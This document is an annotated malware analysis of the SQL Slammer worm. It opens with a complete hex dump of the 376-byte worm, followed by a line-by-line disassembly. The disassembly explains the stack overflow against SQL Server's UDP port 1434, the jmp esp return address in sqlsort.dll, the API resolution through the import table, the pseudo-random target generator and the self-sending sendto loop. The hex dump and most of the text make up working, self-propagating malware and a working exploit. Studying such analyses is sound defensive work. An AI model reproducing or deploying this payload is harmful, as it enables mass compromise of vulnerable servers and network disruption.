#
# pedram amini
# pedram [at] redhive [dot] com
#

00000000h: 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000010h: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000020h: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000030h: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000040h: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000050h: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ; ................
00000060h: 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ; .ÜÉ°Bë........p®
00000070h: 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 ; B.p®BhÜÉ
00000080h: B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 ; °B¸....1É±.Pâý5.
00000090h: 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ; ...P‰åQh.dllhel3
000000a0h: 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B ; 2hkernQhounthick
000000b0h: 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ; ChGetTf¹llQh32.d
000000c0h: 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 ; hws2_f¹etQhsockf
000000d0h: B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 ; ¹toQhsend¾..®BE
000000e0h: D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 ; ÔPÿ.PEàPEðPÿ.P
000000f0h: BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ; ¾..®B‹.‹.=U‹ìQt.
00000100h: BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ; ¾..®Bÿ.ÿÐ1ÉQQPñ
00000110h: 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ; ...›ñ....QEÌP‹
00000120h: 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 ; EÀPÿ.j.j.j.ÿÐPE
00000130h: C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 ; ÄP‹EÀPÿ.‰Æ.Ûó<a
00000140h: D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ; Ùÿ‹E´.@.ˆÁâ..Â
00000150h: C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ; Áâ.)Â..Ø‰E´j.
00000160h: 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 ; E°P1ÉQfñx.QE.P
00000170h: 8B 45 AC 50 FF D6 EB CA                         ; ‹E¬PÿÖëÊ

worm exploits stack overflow, with \x04\x01\x01 ...
eip is overwritten with 0x42B0C9DC.
this address lies within sqlsort.dll containing the instruction jmp esp.
jmp esp is executed and we end up at the start of our worm code.
at this point in time our stack contains the worm from above @ offset 61h.

    top of stack:       67h
                        ...
    bottom of stack:    177h

the worm later transmits itself using sendto() utilizing the stack as the tx
buffer, so the worm starts off by adding the overflow string to the stack.

    push    42B0C9DCh       ; push the eip overwrite address
    mov     eax, 1010101h   ; eax = 0x1010101
    xor     ecx, ecx        ; ecx = 0
    mov     cl, 18h         ; cl  = 24 (cl = byte, cx = word, ecx = dword)

FIXUP:                      ; loop 24 times
    push    eax             ; put 0x1010101 onto stack
    loop    FIXUP           ; loop, decrementing cl
    xor     eax, 5010101h   ; eax = 0x40000000
    push    eax             ; push 0x4000000 onto stack

the worm has now recreated it's original self, as seen above as the 376 bytes
at esp. snapshot of stack:

                       ebp+3  ebp
                         V     V
    top of stack:       40000000
                        24 * 0x1010101
                        0x42B0C9DC
                        67h
                        ...
    bottom of stack:    177h

the stack pointer is moved into the frame pointer, so that future stack
variables can be referenced from this offset.

    mov     ebp, esp        ; ebp = esp

create a symbol table. the worm relies on these functions / libraries, and will
be loading them in the near future.

    push    ecx             ; push null (0x00) onto stack
    push    6C6C642Eh
    push    32336C65h
    push    6E72656Bh       ; kernel32      (ebp-10h)

    push    ecx
    push    746E756Fh
    push    436B6369h
    push    54746547h       ; GetTickCount  (ebp-20h)
    mov     cx, 6C6Ch

    push    ecx
    push    642E3233h
    push    5F327377h       ; ws2_32.dll    (ebp-2Ch)
    mov     cx, 7465h
    push    ecx

    push    6B636F73h       ; socket        (ebp-34h)
    mov     cx, 6F74h
    push    ecx

    push    646E6573h       ; sendto        (ebp-3Ch)

the worm needs the address of LoadLibraryA, it obtains this from the Import
Address Table (IAT) located in sqlsort.dll at 0x42AE1018.

    HMODULE LoadLibrary(
      LPCTSTR lpFileName
    );

    mov     esi, 42AE1018h  ; esi  = IAT of LoadLibraryA
    lea     eax, [ebp-2Ch]  ; eax  = ws2_32.dll
    push    eax             ; save string address of ws2_32.dll    (ebp-40h)

    call    dword ptr [esi] ; LoadLibraryA(ws2_32.dll)             (pop 1)
    push    eax             ; save library address of ws2_32.dll   (ebp-40h)

    lea     eax, [ebp-20h]  ; eax  = GetTickCount
    push    eax             ; save string address of GetTickCount  (ebp-44h)

    lea     eax, [ebp-10h]  ; eax = kernel32.dll
    push    eax             ; save string address of kernel32.dll  (ebp-48h)

    call    dword ptr [esi] ; LoadLibraryA(kernel32.dll)           (pop 1)
    push    eax             ; arg1 = kernel32.dll                  (ebp-48h)

the worm now needs the address of GetProcAddress, again references the IAT.

    FARPROC GetProcAddress(
      HMODULE hModule,
      LPCSTR lpProcName
    );

    mov     esi, 42AE1010h  ; esi = IAT of GetProcAddress
    mov     ebx, [esi]      ; ebx = GetProcAddress
    mov     eax, [ebx]      ; eax = first 4 bytes of GetProcAddress
    cmp     eax, 51EC8B55h  ; fingerprint GetProcAddress, is this it?
    jz      short VALID_GP  ; if so then skip the next step
    mov     esi, 42AE101Ch  ; if not esi = default address of GetProcAddress
VALID_GP:

the worm now makes a call to GetTickCount to return the number of milliseconds
that have elapsed since the system last started. this is used as a random seed
in determining target addresses to scan.

    call    dword ptr [esi] ; GetProcAddress(kernel32.dll, GetTickCount) (pop 2)
    call    eax             ; ret from GetProcaddress = GetTickCount entrypoint

start filling in the sockaddr_in structure:

    struct sockaddr_in {
            short   sin_family;
            u_short sin_port;
            struct  in_addr sin_addr;
            char    sin_zero[8];
    };

    xor     ecx, ecx        ; ecx         = 0
    push    ecx             ; sin_zero[4] = 0                    (ebp-44h)
    push    ecx             ; sin_zero[0] = 0                    (ebp-48h)
    push    eax             ; sin_addr    = GetTickCount()       (ebp-4Ch)
    xor     ecx, 9B040103h  ; ecx         = 0x9B040103
    xor     ecx, 1010101h   ; ecx         = 0x9a050002
    push    ecx             ; sin_port    = 1434 (0x59a)
                            ; sin_family  = AF_INET (0x2)        (ebp-50h)

worm now wants to create a socket so it begins by finding out where socket() is.

    lea     eax, [ebp-34h]  ; eax = socket
    push    eax             ; save string address of socket      (ebp-54h)
    mov     eax, [ebp-40h]  ; eax = ws2_32.dll
    push    eax             ; save string address of ws2_32.dll  (ebp-58h)
    call    dword ptr [esi] ; GetProcAddress(ws2_32.dll, socket) (pop 2)

at this point eax = socket(), so the worm pushes the arguments onto the stack, 
makes the call, and saves the returned socket descriptor on the stack.

    SOCKET socket(
      int af,
      int type,
      int protocol
    );

    push    11h             ; IPPROTO_UDP                        (ebp-54h)
    push    2               ; SOCK_DGRAM                         (ebp-58h)
    push    2               ; AF_INET                            (ebp-5Ch)
    call    eax             ; socket(2, 2, 0x11)                 (pop 3)
    push    eax             ; save socket descriptor             (ebp-54h)

before the worm enters an infinite loop it needs to determine the location of
sendto(), it saves this value in esi.

    lea     eax, [ebp-3Ch]  ; eax  = sendto
    push    eax             ; save string address of sendto      (ebp-58h)
    mov     eax, [ebp-40h]  ; eax  = ws2_32.dll
    push    eax             ; save string address of ws2_32.dll  (ebp-5Ch)
    call    dword ptr [esi] ; GetProcAddress(ws2_32.dll, sendto) (pop 2)
    mov     esi, eax        ; esi = sendto()
    or      ebx, ebx        ; ebx = ebx (should be xor ???)
    xor     ebx, 0FFD9613Ch ; ebx = 0x0FFD9613C

the pRNG function is actually very simple. in essence it multiplies the last
value by 214,013. the two aspects of "randomness" are the GetTickCount, and the
address of GetProcAddress. what is the significance of 0x0FFD9613C (4292436284)?

PRND:
    mov     eax, [ebp-4Ch]  ; eax = sockaddr_in->sin_addr
    lea     ecx, [eax+eax*2]; ecx = eax + eax * 2
    lea     edx, [eax+ecx*4]; edx = eax + ecx * 4
    shl     edx, 4          ; edx = edx << 4
    add     edx, eax        ; edx += eax
    shl     edx, 8          ; edx = edx << 8
    sub     edx, eax        ; edx -= eax
    lea     eax, [eax+edx*4]; eax = eax + edx * 4
    add     eax, ebx        ; eax += ebx
    mov     [ebp-4Ch], eax  ; sockaddr_in->sin_addr = eax

time to make the sendto() call, here are the arguments:

    int sendto (
        SOCKET s,
        const char *buf,
        int len,
        int flags,
        const struct sockaddr *to,
        int tolen);

    push    10h             ; tolen = sizeof(struct sockaddr_in) = 0x10 (16)
    
    lea     eax, [ebp-50h]  ; eax = sockaddr_in
    push    eax             ; const struct sockaddr *to = ebp-50h
    
    xor     ecx, ecx        ; ecx = 0
    push    ecx             ; flags = 0x00
    
    xor     cx, 178h        ; cx = 0x178 (376)
    push    ecx             ; len = 376
    
    lea     eax, [ebp+3]    ; eax = ebp + 3
    push    eax             ; buf = ebp + 3 (the worm)
    
    mov     eax, [ebp-54h]  ; socket descriptor
    push    eax             ; SOCKET s = ebp-54h
    
    call    esi             ; sendto()
    
    jmp     short PRND      ; mangle address and loop again